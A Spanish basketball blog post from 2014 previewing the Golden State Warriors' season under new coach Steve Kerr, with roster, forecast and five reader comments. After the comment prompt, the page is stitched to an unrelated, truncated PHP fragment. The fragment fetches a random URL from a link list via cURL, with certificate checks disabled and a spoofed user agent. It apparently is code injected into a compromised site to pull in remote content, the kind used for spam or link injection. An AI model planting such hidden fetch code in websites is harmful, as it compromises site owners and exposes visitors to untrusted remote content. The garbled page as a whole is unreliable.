Golden State Warriors 2014-2015: Kerr o no Kerr

04 de October de 2014 por SundayDriver

La temporada 2013-2014 concluyó para Golden State Warriors con el despido de su entrenador jefe, Mark Jackson, tras tres años en la franquicia californiana. Después de una primera temporada mala (23-43, fuera de Playoffs), las dos siguientes constituyeron una notable mejoría en el récord del equipo (47-35 y 51-31), ambas en Playoffs, donde cayeron en segunda y primera ronda respectivamente. Aparte, las estadísticas de equipo mejoraron año tras año, incluso a nivel defensivo, uno de los puntos más flojos de los californianos. A nivel individual, Stephen Curry y Klay Thompson han pasado a tener niveles de juego estelares, sobre todo el primero. Todo este bagaje acumulado no fue suficiente para evitar la caída de Jackson. Evidentemente, opiniones hay para todos los gustos, pero la medida es como poco controvertida. Se rumorea que su relación con las altas esferas de la franquicia no era demasiado fluidas. Sea como fuere, Golden State ha decidido ponerse en las manos de otro ex-jugador, Steve Kerr, debutante como entrenador jefe, y mucho más conocido por sus habilidades detrás del micrófono, como analista en TV.

Stephen Curry Klay Thompson

Movimientos clave

Por el momento, el único movimiento destacable es la ya referida contratación de Kerr, que previamente había rechazado una oferta de Phil Jackson para hacerse con el banquillo de los Knicks. Kerr dudó en aceptar el puesto, ya que no entendía el despido de Jackson tras tres años de mejoría del equipo, aunque finalmente encontró razonables las explicaciones recibidas. Se espera que Kerr implante en Golden State el famoso triángulo ofensivo, aunque ajustado a la características de Stephen Curry. A nivel de plantilla, poca cosa salvo las contrataciones de Shaun Livingston, Leandro Barbosa y Brandon Rush, recambios de Curry y Thompson. Jordan Crawford abandona el equipo buscando los yuanes chinos. El banquillo fue uno de los puntos flojos del equipo el año pasado, y no parece que vayan a llegar muchos más refuerzos.

Qué esperamos de ellos

Kerr se encuentra con un equipo hecho, practicamente intacto y en tendencia ascendente. A priori, parece difícil superar esas 51 victorias de la temporada pasada, sobre todo por la incertidumbre causada por el cambio en el banquillo. Sin embargo, tampoco deberían estar muy lejos de ellas, ya que un quinteto compuesto por Curry-Thompson-Iguodala-Lee-Bogut debería garantizar al menos la entrada en Playoffs. Pero la competencia en el Oeste será dura, como siempre: con Phoenix y Dallas reforzados, y Memphis que siempre está ahí, el puesto de Playoffs para Golden State no está ni mucho menos garantizado. Mucha parte del éxito radicará en recuperar al mejor Lee, que Iguodala eleve su nivel y que Bogut se mantenga sano. Y más aportación desde el banquillo, sin mucho peso desde el dúo Jack-Landry: Barnes y Livingston son la esperanza para ello.

Pronóstico

49 victorias, última plaza de Playoffs.

Plantilla

PG: Stephen Curry, Shaun Livingston
SG: Klay Thompson, Brandon Rush, Leandrinho Barbosa
F: Andre Iguodala, Harrison Barnes
PF : David Lee, Draymond Green, Marreese Speights
C: Andrew Bogut, Festus Ezeli

Bajas: Jermaine O’Neal, Steve Blake, Hilton Armstrong, Jordan Crawford.

Comenta

5 comentarios a esta entrada

  1. Azabel dice:
    #1

    en condiciones saludables, pues no deberian invidiarle nada a nadie, pero eso ya es una utopia, curry, lee y bogut sn unos cristalitos, imposible que todos terminen sanos

    yo habria intentado canjear a Barnes antes q esa banca de suplentes le haga perder todo el valor que algun dia tuvo, una pena como han desperdiciado a ese muchacho

      Citar

  2. TheDeerHunter dice:
    #2

    Coincido en grandes líneas, aunque me resisto a pensar que andarán tan justos en el Oeste.
    Livingston, si da el nivel que dió en Nets es una buena incorporación que ofrece muchas alternativas tácticas y mejora la segunda unidad. Ahora que echarán de menos a Jermaine si Bogut sigue padeciendo tantos problemas.
    A ver si logran recuperar a Barnes para la causa.
    Los sigo viendo un plantillón bestial, peligrosísimos en playoffs ya sean como octavos o más arriba. Eso sí, es verdad que para optar a objetivos más elevados se han quedado un poco estancados.

      Citar

  3. MagicJohnson32 dice:
    #3

    El verano se les planteó con la posibilidad de Kevin Love, pero más allá de eso, parecía claro que el margen de mejora de cara a la próxima temporada no llegaría con refuerzos sino sobre todo de sacar más partido a la plantilla, especialmente de Harrison Barnes e Iggy. A Curry no se le puede pedir mucho más, tal vez una mejor lectura en el rol de base. De Klay sí hay que esperar más y el Mundial ha sido un ejemplo clarísimo de que su techo es más alto de lo que le hemos visto en los Warriors.

    Me gusta mucho la llegada de Livingston y, aunque no soy fan de Barbosa, creo que les puede dar una buena rotación, algo diferente.

    Hablar de la salud de Bogut como clave es casi como decir que están destinados al fracaso, pero estaría muy bien que este equipo tuviese una oportunidad de llegar sano y rindiendo a tope a Playoffs. Como dice Deer, peligrosísimos ahí.

      Citar

  4. rumbero dice:
    #4

    A lo dicho ya, yo tengo ganas de ver el papel de Draymond Green en el equipo después de los PO contra Clippers en los que estuvo fenomenal. Le puede pasar un poco como a Barnes la temporada pasada en las que también levantó muchas expectativas, pero puede llegar a ser una muy buena solución como 4 conociendo la fragilidad de la pintura de los Warriors. Un tio que imprime carácter al equipo y que hace de todo.
    Como decís un equipo siempre peligrosos al que habrá que ver como le afecta la mano de Kerr

      Citar

  5. portu dice:
    #5

    Los playoffs son diferentes a la Regular season, siempre aparecen actores 2rios inesperados q destacan y luego en Regular vuelven a echarse la siesta. La rotación de los warriors es muy buena, el equipo está madurando poco a poco y el jugador que creo debe encajar es simplemente Iguodala, todo lo demás parece hecho a medida. Veremos qué pretende Kerr de cada uno, pero a priori partesn como uno de los gallitos del Oeste.
    Y Magic, como base Curry hizo un gran cambio la temporada pasada, hizo de verdadero playmaker y sus asistencias subieron bastante…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>